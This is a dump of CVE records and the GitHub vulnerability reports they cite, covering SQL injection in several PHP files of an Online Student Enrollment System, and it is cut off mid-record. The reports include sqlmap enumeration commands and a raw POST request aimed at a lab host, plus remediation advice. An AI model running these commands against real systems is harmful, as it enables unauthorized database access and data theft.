src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/c132dda1-0e34-4e68-ae48-a696d28569a7"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online Student Enrollment System Project In PHP editSubject.php SQL injection
https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/5/comments
0
2024-05-26T03:42:45Z
2024-05-26T03:42:45Z
https://github.com/Lanxiy7th/lx_CVE_report-/issues/5
2,317,418,785
5
6,036
CVE-2024-5393
2024-05-27T02:15:09.240
A vulnerability was found in itsourcecode Online Student Enrollment System 1.0. It has been classified as critical. This affects an unknown part of the file listofcourse.php. The manipulation of the argument idno leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266307.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/6" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266307" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266307" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344608" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266307" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266307" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344608" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Lanxiy7th/lx_CVE_report-/issues/6
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Lanxiy7th", "lx_CVE_report-" ]
# Itsourcecode Online Student Enrollment System Project In PHP listofcourse.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Student Enrollment System Project In PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Lanxiy7th ## Vulnerable File + listofcourse.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'listofcourse.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "idno" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="758" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/b09daf68-eae9-48ed-b1d5-be2893e2133d"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "listofcourse.php" file. This vulnerability stems from insufficient user input validation of the "idno" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + boolean-based blind + time-based blind ## Vulnerability location: + 'idno' parameter ## Payload: <img width="317" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/dda6a8ab-d0d2-4066-8b84-336b8f15b794"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "http://192.168.144.199:1217/kccreg/listofcourse.php?idno=123&Major=123" --batch --level 5 --dbs ``` <img width="314" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/f94a127f-c4fa-4b94-9262-5ffe3d0a985b"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online Student Enrollment System Project In PHP listofcourse.php SQL injection
https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/6/comments
0
2024-05-26T03:55:14Z
2024-05-26T03:55:14Z
https://github.com/Lanxiy7th/lx_CVE_report-/issues/6
2,317,425,493
6
6,037
CVE-2024-5394
2024-05-27T02:15:09.530
A vulnerability was found in itsourcecode Online Student Enrollment System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file newDept.php. The manipulation of the argument deptname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266308.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/7" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266308" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266308" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344612" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266308" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266308" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344612" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Lanxiy7th/lx_CVE_report-/issues/7
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Lanxiy7th", "lx_CVE_report-" ]
# Itsourcecode Online Student Enrollment System Project In PHP newDept.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Student Enrollment System Project In PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Lanxiy7th ## Vulnerable File + newDept.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'newDept.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "deptname" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="512" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/35160c39-3994-48ae-886b-559e0b2dd7ce"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "newDept.php" file. This vulnerability stems from insufficient user input validation of the "deptname" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC POST /kccreg/newDept.php HTTP/1.1 Host: 192.168.144.199:1217 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 39 Origin: http://192.168.144.199:1217 Connection: close Referer: http://192.168.144.199:1217/kccreg/newDept.php Cookie: pma_lang=zh_CN; phpMyAdmin=len9ob4npbvfdq6covmbegt63r; pmaUser-1=%7B%22iv%22%3A%22T%5C%2FCNohNoUS6vPeq7Nu7Zlw%3D%3D%22%2C%22mac%22%3A%22612b6061a48fea2497ec15d24ac758094d001624%22%2C%22payload%22%3A%22oBKb1qokv1s8RyKQorlz4w%3D%3D%22%7D; PHPSESSID=hnl0ppij1sd9vouvkhsg32c1j5; pmaAuth-1=%7B%22iv%22%3A%229HoKmgAu8K5%5C%2FvRe%5C%2FctcrUw%3D%3D%22%2C%22mac%22%3A%22d1b4c1f728f0b917499c499c26c1efc9e4cc99c7%22%2C%22payload%22%3A%22A4x7p0kon2pEBGwcRUcZJJM01WQ6mIgqc1HifbZxU2o%3D%22%7D Upgrade-Insecure-Requests: 1 Priority: u=1 deptid=&deptname=123&deptdesc=123&save= ## Vulnerability type: + boolean-based blind + time-based blind ## Vulnerability location: + 'deptname' parameter ## Payload: <img width="318" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/f8c17c66-5844-48b3-a5a5-5549ce487d5f"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r abc --batch --dbs ``` <img width="308" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/2207dc2a-a337-40ad-b2b8-35e83d3b5108"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online Student Enrollment System Project In PHP newDept.php SQL injection
https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/7/comments
0
2024-05-26T04:13:15Z
2024-05-26T04:14:08Z
https://github.com/Lanxiy7th/lx_CVE_report-/issues/7
2,317,452,360
7
6,038
CVE-2024-5395
2024-05-27T03:15:08.370
A vulnerability was found in itsourcecode Online Student Enrollment System 1.0. It has been rated as critical. This issue affects some unknown processing of the file listofinstructor.php. The manipulation of the argument FullName leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266309 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/8" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266309" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266309" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344622" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266309" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266309" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344622" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Lanxiy7th/lx_CVE_report-/issues/8
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Lanxiy7th", "lx_CVE_report-" ]
# Itsourcecode Online Student Enrollment System Project In PHP listofinstructor.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Student Enrollment System Project In PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Lanxiy7th ## Vulnerable File + listofinstructor.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'listofinstructor.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "FullName" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="680" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/dd570534-0f71-4d7e-a08b-1fab5a45a73c"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "listofinstructor.php" file. This vulnerability stems from insufficient user input validation of the "FullName" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + boolean-based blind + time-based blind ## Vulnerability location: + 'FullName' parameter ## Payload: <img width="320" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/15f5cb9d-a7a0-46dc-8e28-054c3be4a0a4"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "http://192.168.144.199:1217/kccreg/listofinstructor.php?instuctorId=&FullName=123321" --batch --dbs ``` <img width="319" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/1f8b5dd0-a927-4a34-9e3c-18e22046ad27"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online Student Enrollment System Project In PHP listofinstructor.php SQL injection
https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/8/comments
0
2024-05-26T04:42:31Z
2024-05-26T04:42:32Z
https://github.com/Lanxiy7th/lx_CVE_report-/issues/8
2,317,479,011
8
6,039
CVE-2024-5396
2024-05-27T03:15:08.650
A vulnerability classified as critical has been found in itsourcecode Online Student Enrollment System 1.0. Affected is an unknown function of the file newfaculty.php. The manipulation of the argument name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266310 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", 